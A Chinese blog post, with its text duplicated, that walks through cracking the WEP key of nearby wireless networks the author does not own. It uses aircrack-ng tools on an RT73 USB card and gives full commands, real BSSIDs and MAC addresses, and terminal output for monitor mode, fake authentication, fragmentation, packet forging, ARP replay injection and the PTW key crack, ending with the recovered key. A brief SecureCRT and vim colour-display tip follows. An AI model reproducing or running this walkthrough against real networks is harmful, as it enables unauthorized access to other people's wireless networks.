RT73网卡破解WIFI密码(WEP)&& secureCRT中VI编辑器显示彩色文本
2010-04-15 11:35
489 查看
出于兴趣需要,想连接下多个地方的无线WIFI网络,结果都需要密钥。所以就花了几天时间照网上的方法破解下试试,终于被俺试出来了,过程如下:
1,我的网卡型号是RT73 USB Wireless LAN Card,以上名称是在设备管理器中显示的完整名字,我在XP下装了完整的原厂驱动,但在ubuntu里面是什么驱动都没有装。
2,首先需要了解当前环境下目标WIFI网的名字,频道号。我是用USB引导进入BT3这个工具,进入桌面后,点击里面的WIFI assistant工具,就可以显示当前的网络名字和频道号。记下即可。比如:我记下了当前网络名是:Micorlink_SZ,频道号是11。
3,进入ubuntu,插入无线网卡,保证网卡是正常加载并识别的,正常的话会有一个提示框,显示加载ralink RT73无线网卡。
4,新建立一个终端运行:ifconfig -a
终端显示:
wlan0 Link encap:以太网 硬件地址 00:0c:43:2a:36:c4
BROADCAST MULTICAST MTU:1500 跃点数:1
接收数据包:0 错误:0 丢弃:0 过载:0 帧数:0
发送数据包:0 错误:0 丢弃:0 过载:0 载波:0
碰撞:0 发送队列长度:1000
接收字节:0 (0.0 B) 发送字节:0 (0.0 B)
参数说明:显示完整的PC网络配置。
功能:通过此命令可以得到自己的无线网卡的名字和MAC地址,备用。
5,终端运行:airmon-ng start wlan0 11
终端显示:
Interface Chipset Driver
wlan0 Ralink 2573 USB rt73usb - [phy1] (monitor mode enabled on mon0)
参数说明:wlan0是自己的无线网卡加载名字,11是目标网开放的频道号。
功能:第一次执行此命令,会提示安装ai的XX软件,用apt-get install安装它要求的软件即可。此命令是将自己的无线网卡置于monitor 模式,有抓包的功能。运行该命令成功后,会看到无线网卡升级成监控模式后的别名,就是mon0。如果发现弄错了频道可以多试几次。
6,终端运行:airodump-ng --ivs -w name -c 11 mon0
终端显示:
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1D:73:DE:9C:F5 -55 71 16605 14114 12 11 54 . WEP WEP OPN Microlink_SZ
00:1D:0F:84:06:8C -53 0 31 0 0 6 54 . WEP WEP TP-LINK
00:1D:73:DE:A8:1D -63 99 17107 62334 11 11 54 . WEP WEP OPN Microlink_SZ
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:11:F6:88:14:D6 -69 0 - 1 0 61
(not associated) 00:1F:3A:97:B1:CE -71 0 - 1 0 92
00:1D:73:DE:9C:F5 00:1F:3B:16:00:CB -69 1 -12 8 5215 Microlink_SZ
00:1D:73:DE:9C:F5 00:1F:3B:A0:C2:1B -69 54 - 6 18 4707 WXYZ,Microlink_SZ
参数说明:BSSID是AP的MAC地址;PWR是AP信号的强度大小,一般低于10就丢包比较严重,难破解;RXQ是干扰的大小;Beacons是发送接收的包,在跳说明有数据;#Data是接收到的可以用来破解的特殊包,如果一直不变说明没有客户端连接,比较难破解;CH是频道号;MB是网络连接速度,54就是54MB;ENC、CIPHER、AUTH是加密方式,显示WEP的才可以破解;ESSID 是AP的名字,为了阻挡别人破解可以才用中文的名字。
功能:列出无线WIFI网的信息。这个窗口开着就好了,不用管它。
7,新建一个终端,运行:aireplay-ng -1 0 -e Microlink_SZ -a 001d73dea81d -h 000c432a36c4 mon0
终端显示:
10:44:54 Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11
10:44:54 Sending Authentication Request (Open System) [ACK]
10:44:54 Authentication successful
10:44:54 Sending Association Request [ACK]
10:44:54 Association successful :-) (AID: 1)
参数说明:Microlink_SZ是AP的名字;001d73dea81d是目标要破解网卡的MAC地址,由第六步可以得到,注意去掉中间的冒号;000c432a36c4是自己网卡的MAC地址,由第四步可以得到,也要去掉冒号;mon0是由第五步得到的监控名字。
功能:这个命令主要是针对#Data增长缓慢的AP,aireplay顾名思义就是重发模拟发包的意思,是一条欺骗命令,连接上AP。如果执行成功,那么会显示 successful :-) 。
8,终端运行:aireplay-ng -5 -b 001d73dea81d -h 000c432a36c4 mon0
终端显示:
10:54:18 Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11
10:54:18 Waiting for a data packet...
Read 27 packets...
Size: 88, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1D:73:DE:A8:1D
Dest. MAC = 00:1E:BE:C7:B8:CA
Source MAC = 00:1F:3A:52:BD:73
0x0000: 0841 2c00 001d 73de a81d 001f 3a52 bd73 .A,...s.....:R.s
0x0010: 001e bec7 b8ca f021 2d42 0000 31f4 7340 .......!-B..1.s@
0x0020: b50a bd80 41fc 1d01 5103 5ec1 21fa 4a5e ....A...Q.^.!.J^
0x0030: f423 aced ff21 8623 664c 815b f58c f6e7 .#...!.#fL.[....
0x0040: 8b8c 2b31 4319 2a9e f99c e895 af6a bb13 ..+1C.*......j..
0x0050: dd55 d2d7 0eda 68da .U....h.
Use this packet ? y
Saving chosen packet in replay_src-0415-105425.cap
10:55:12 Data packet found!
10:55:12 Sending fragmented packet
10:55:12 Got RELAYED packet!!
10:55:12 Trying to get 384 bytes of a keystream
10:55:12 Got RELAYED packet!!
10:55:12 Trying to get 1500 bytes of a keystream
10:55:13 Got RELAYED packet!!
Saving keystream in fragment-0415-105512.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
参数说明:001d73dea81d 是目标破解的AP的MAC地址;000c432a36c4 是自己网卡的MAC地址;mon0是监控别名。
功能:上一条成功后,开始收集#Data的数据,才能够进行模拟破解。如果#Data没有增加,该命令会一直执行,直到捕获一个#Data包。之后,程序会问你是否用这个包来模拟攻击,回答Y即可。如果攻击成功,则会显示。成功之后会显示一个文件名:fragment-xxxx-xxxx.xor文件,这个文件马上就会用到,该文件是保存在root目录下(我自己的电脑)。
9,终端运行:packetforge-ng -0 -a 001d73dea81d -h 000c432a36c4 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0415-105512.xor -w mrarp
终端显示:
Wrote packet to: mrarp
参数说明:001d73dea81d 是待破解的MAC地址;000c432a36c4 是自己的MAC地址;fragment-0415-105512.xor就是第八步显示的文件名;
功能:破解包的准备过程,显示生成文件到mrarp。
10,终端运行:aireplay-ng -2 -r mrarp -x 512 mon0
终端显示:
No source MAC (-h) specified. Using the device MAC (00:0C:43:2A:36:C4)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1D:73:DE:A8:1D
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0C:43:2A:36:C4
0x0000: 0841 0201 001d 73de a81d 000c 432a 36c4 .A....s.....C*6.
0x0010: ffff ffff ffff 8001 e4cb 8500 0039 fd12 .............9..
0x0020: 169e 7a6a b98d 8bd7 08d9 6bb3 fed2 5890 ..zj......k...X.
0x0030: d1bc d1ef 2bfe 0ec7 b11d 3032 246e 40c9 ....+.....02$n@.
0x0040: a65a 27af .Z'.
Use this packet ? y
Saving chosen packet in replay_src-0415-110249.cap
sending package xxxx.
参数说明:mon0是自己的无线网卡监听设备别名;512 是攻击速度,1024是最大值,一般512即可。
功能:这一步开始后,选择Y会看到sending 的package 数量在增加,同时第一个终端里面显示的#Data也在快速增加,只需等待即可。
11,新建终端运行:aircrack-ng -n 64 -b 001d73dea81d name-01.ivs
终端显示:
Opening name-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 40103 ivs.
Aircrack-ng 1.0 rc3
[00:00:11] Tested 8 keys (got 40982 IVs)
KB depth byte(vote)
0 0/ 1 36(58156) 8A(48492) B5(48016) 86(47920) 19(47676)
1 0/ 1 39(52472) 83(47580) B2(46496) D0(46448) 29(46312)
2 0/ 1 39(53488) 22(48804) FC(48144) 85(48108) 55(47784)
3 0/ 1 39(54596) A7(48580) 46(48568) 76(48392) 22(47804)
4 0/ 7 04(48432) BD(47996) 04(47680) B9(47524) 17(47376)
KEY FOUND! [ 36:39:39:39:39 ] (ASCII: 69999 )
Decrypted correctly: 100%
参数说明:001d73dea81d 是要破解的目标MAC地址;name-01.ivs是之前生成的一个文件,在root目录下以name-xx.ivs命名,寻找最大编号的那个。
功能:只要#Data达到10000以上,一会儿就会显示破解出来的密码,同时会显示对应的ASCII码。如果运气不好,多等待一下即可。
================================================================================================
secureCRT中,首先设置选型-》会话选项-》终端-》仿真,仿真模式选择ANSI,并勾选ANSI颜色复选框。
接着编辑文件/etc/vim/vimrc,把syntax on前的注释去掉,但发现这样做还不行。如下已经是修改过的,还是没有显示彩色
再升级VI编辑器,用apt-get install vim之后,再编辑VIM就好了。
参考文章:http://www.city009.cn/wep-wap-pojie-8.html
参考原文:http://blog.csdn.net/rooklyn21/article/details/14230119
1,我的网卡型号是RT73 USB Wireless LAN Card,以上名称是在设备管理器中显示的完整名字,我在XP下装了完整的原厂驱动,但在ubuntu里面是什么驱动都没有装。
2,首先需要了解当前环境下目标WIFI网的名字,频道号。我是用USB引导进入BT3这个工具,进入桌面后,点击里面的WIFI assistant工具,就可以显示当前的网络名字和频道号。记下即可。比如:我记下了当前网络名是:Micorlink_SZ,频道号是11。
3,进入ubuntu,插入无线网卡,保证网卡是正常加载并识别的,正常的话会有一个提示框,显示加载ralink RT73无线网卡。
4,新建立一个终端运行:ifconfig -a
终端显示:
wlan0 Link encap:以太网 硬件地址 00:0c:43:2a:36:c4
BROADCAST MULTICAST MTU:1500 跃点数:1
接收数据包:0 错误:0 丢弃:0 过载:0 帧数:0
发送数据包:0 错误:0 丢弃:0 过载:0 载波:0
碰撞:0 发送队列长度:1000
接收字节:0 (0.0 B) 发送字节:0 (0.0 B)
参数说明:显示完整的PC网络配置。
功能:通过此命令可以得到自己的无线网卡的名字和MAC地址,备用。
5,终端运行:airmon-ng start wlan0 11
终端显示:
Interface Chipset Driver
wlan0 Ralink 2573 USB rt73usb - [phy1] (monitor mode enabled on mon0)
参数说明:wlan0是自己的无线网卡加载名字,11是目标网开放的频道号。
功能:第一次执行此命令,会提示安装ai的XX软件,用apt-get install安装它要求的软件即可。此命令是将自己的无线网卡置于monitor 模式,有抓包的功能。运行该命令成功后,会看到无线网卡升级成监控模式后的别名,就是mon0。如果发现弄错了频道可以多试几次。
6,终端运行:airodump-ng --ivs -w name -c 11 mon0
终端显示:
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1D:73:DE:9C:F5 -55 71 16605 14114 12 11 54 . WEP WEP OPN Microlink_SZ
00:1D:0F:84:06:8C -53 0 31 0 0 6 54 . WEP WEP TP-LINK
00:1D:73:DE:A8:1D -63 99 17107 62334 11 11 54 . WEP WEP OPN Microlink_SZ
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:11:F6:88:14:D6 -69 0 - 1 0 61
(not associated) 00:1F:3A:97:B1:CE -71 0 - 1 0 92
00:1D:73:DE:9C:F5 00:1F:3B:16:00:CB -69 1 -12 8 5215 Microlink_SZ
00:1D:73:DE:9C:F5 00:1F:3B:A0:C2:1B -69 54 - 6 18 4707 WXYZ,Microlink_SZ
参数说明:BSSID是AP的MAC地址;PWR是AP信号的强度大小,一般低于10就丢包比较严重,难破解;RXQ是干扰的大小;Beacons是发送接收的包,在跳说明有数据;#Data是接收到的可以用来破解的特殊包,如果一直不变说明没有客户端连接,比较难破解;CH是频道号;MB是网络连接速度,54就是54MB;ENC、CIPHER、AUTH是加密方式,显示WEP的才可以破解;ESSID 是AP的名字,为了阻挡别人破解可以才用中文的名字。
功能:列出无线WIFI网的信息。这个窗口开着就好了,不用管它。
7,新建一个终端,运行:aireplay-ng -1 0 -e Microlink_SZ -a 001d73dea81d -h 000c432a36c4 mon0
终端显示:
10:44:54 Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11
10:44:54 Sending Authentication Request (Open System) [ACK]
10:44:54 Authentication successful
10:44:54 Sending Association Request [ACK]
10:44:54 Association successful :-) (AID: 1)
参数说明:Microlink_SZ是AP的名字;001d73dea81d是目标要破解网卡的MAC地址,由第六步可以得到,注意去掉中间的冒号;000c432a36c4是自己网卡的MAC地址,由第四步可以得到,也要去掉冒号;mon0是由第五步得到的监控名字。
功能:这个命令主要是针对#Data增长缓慢的AP,aireplay顾名思义就是重发模拟发包的意思,是一条欺骗命令,连接上AP。如果执行成功,那么会显示 successful :-) 。
8,终端运行:aireplay-ng -5 -b 001d73dea81d -h 000c432a36c4 mon0
终端显示:
10:54:18 Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11
10:54:18 Waiting for a data packet...
Read 27 packets...
Size: 88, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1D:73:DE:A8:1D
Dest. MAC = 00:1E:BE:C7:B8:CA
Source MAC = 00:1F:3A:52:BD:73
0x0000: 0841 2c00 001d 73de a81d 001f 3a52 bd73 .A,...s.....:R.s
0x0010: 001e bec7 b8ca f021 2d42 0000 31f4 7340 .......!-B..1.s@
0x0020: b50a bd80 41fc 1d01 5103 5ec1 21fa 4a5e ....A...Q.^.!.J^
0x0030: f423 aced ff21 8623 664c 815b f58c f6e7 .#...!.#fL.[....
0x0040: 8b8c 2b31 4319 2a9e f99c e895 af6a bb13 ..+1C.*......j..
0x0050: dd55 d2d7 0eda 68da .U....h.
Use this packet ? y
Saving chosen packet in replay_src-0415-105425.cap
10:55:12 Data packet found!
10:55:12 Sending fragmented packet
10:55:12 Got RELAYED packet!!
10:55:12 Trying to get 384 bytes of a keystream
10:55:12 Got RELAYED packet!!
10:55:12 Trying to get 1500 bytes of a keystream
10:55:13 Got RELAYED packet!!
Saving keystream in fragment-0415-105512.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
参数说明:001d73dea81d 是目标破解的AP的MAC地址;000c432a36c4 是自己网卡的MAC地址;mon0是监控别名。
功能:上一条成功后,开始收集#Data的数据,才能够进行模拟破解。如果#Data没有增加,该命令会一直执行,直到捕获一个#Data包。之后,程序会问你是否用这个包来模拟攻击,回答Y即可。如果攻击成功,则会显示。成功之后会显示一个文件名:fragment-xxxx-xxxx.xor文件,这个文件马上就会用到,该文件是保存在root目录下(我自己的电脑)。
9,终端运行:packetforge-ng -0 -a 001d73dea81d -h 000c432a36c4 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0415-105512.xor -w mrarp
终端显示:
Wrote packet to: mrarp
参数说明:001d73dea81d 是待破解的MAC地址;000c432a36c4 是自己的MAC地址;fragment-0415-105512.xor就是第八步显示的文件名;
功能:破解包的准备过程,显示生成文件到mrarp。
10,终端运行:aireplay-ng -2 -r mrarp -x 512 mon0
终端显示:
No source MAC (-h) specified. Using the device MAC (00:0C:43:2A:36:C4)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1D:73:DE:A8:1D
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0C:43:2A:36:C4
0x0000: 0841 0201 001d 73de a81d 000c 432a 36c4 .A....s.....C*6.
0x0010: ffff ffff ffff 8001 e4cb 8500 0039 fd12 .............9..
0x0020: 169e 7a6a b98d 8bd7 08d9 6bb3 fed2 5890 ..zj......k...X.
0x0030: d1bc d1ef 2bfe 0ec7 b11d 3032 246e 40c9 ....+.....02$n@.
0x0040: a65a 27af .Z'.
Use this packet ? y
Saving chosen packet in replay_src-0415-110249.cap
sending package xxxx.
参数说明:mon0是自己的无线网卡监听设备别名;512 是攻击速度,1024是最大值,一般512即可。
功能:这一步开始后,选择Y会看到sending 的package 数量在增加,同时第一个终端里面显示的#Data也在快速增加,只需等待即可。
11,新建终端运行:aircrack-ng -n 64 -b 001d73dea81d name-01.ivs
终端显示:
Opening name-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 40103 ivs.
Aircrack-ng 1.0 rc3
[00:00:11] Tested 8 keys (got 40982 IVs)
KB depth byte(vote)
0 0/ 1 36(58156) 8A(48492) B5(48016) 86(47920) 19(47676)
1 0/ 1 39(52472) 83(47580) B2(46496) D0(46448) 29(46312)
2 0/ 1 39(53488) 22(48804) FC(48144) 85(48108) 55(47784)
3 0/ 1 39(54596) A7(48580) 46(48568) 76(48392) 22(47804)
4 0/ 7 04(48432) BD(47996) 04(47680) B9(47524) 17(47376)
KEY FOUND! [ 36:39:39:39:39 ] (ASCII: 69999 )
Decrypted correctly: 100%
参数说明:001d73dea81d 是要破解的目标MAC地址;name-01.ivs是之前生成的一个文件,在root目录下以name-xx.ivs命名,寻找最大编号的那个。
功能:只要#Data达到10000以上,一会儿就会显示破解出来的密码,同时会显示对应的ASCII码。如果运气不好,多等待一下即可。
================================================================================================
secureCRT中,首先设置选型-》会话选项-》终端-》仿真,仿真模式选择ANSI,并勾选ANSI颜色复选框。
接着编辑文件/etc/vim/vimrc,把syntax on前的注释去掉,但发现这样做还不行。如下已经是修改过的,还是没有显示彩色
再升级VI编辑器,用apt-get install vim之后,再编辑VIM就好了。
参考文章:http://www.city009.cn/wep-wap-pojie-8.html
参考原文:http://blog.csdn.net/rooklyn21/article/details/14230119
相关文章推荐
- android EditView 文本密码显示与…
- 为Ubuntu配置ssh服务,方便远程登陆 && ubuntu设置定时关机 && secureCRT显示彩色
- 用Interl 5100AGN 无线网卡破解无线网络WEP密码
- Kali-WIFI攻防(四)----WEP密码破解之Hirte工具
- CDLinux 系统 破解WIFI密码 U盘 的制作(网卡:博通BCM4313)
- CDLinux 系统 破解WIFI密码 U盘 的制作(网卡:博通BCM4313)
- 解决SecureCRT显示中文乱码、vi编辑器彩色显示问题
- Android中可以做的两件坏事---破解锁屏密码和获取Wifi密码
- WIN7利用虚拟网卡创建AP共享WIFI时无法显示 “Microsoft Virtual WiFi Miniport Adapter”的解决方法
- 微信破解WiFi密码如何操作?一招帮你查看密码!
- Kali Linux 破解WPA2加密的wifi密码
- secureCRT设置彩色和显示中文
- Aircrack除破解WiFi密码外的趣味玩法
- echo及文本彩色显示
- 使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码。
- 用VC++实现console程序显示彩色文本
- 从零开始,教你如何破解WEP、WPA无线网络 密码
- 如何获得WPA握手包&EWSA破解WPA密码教程[zz]
- 用VC++实现console程序显示彩色文本
- 打开wifi热点之后,弹出popBox显示SSID和密码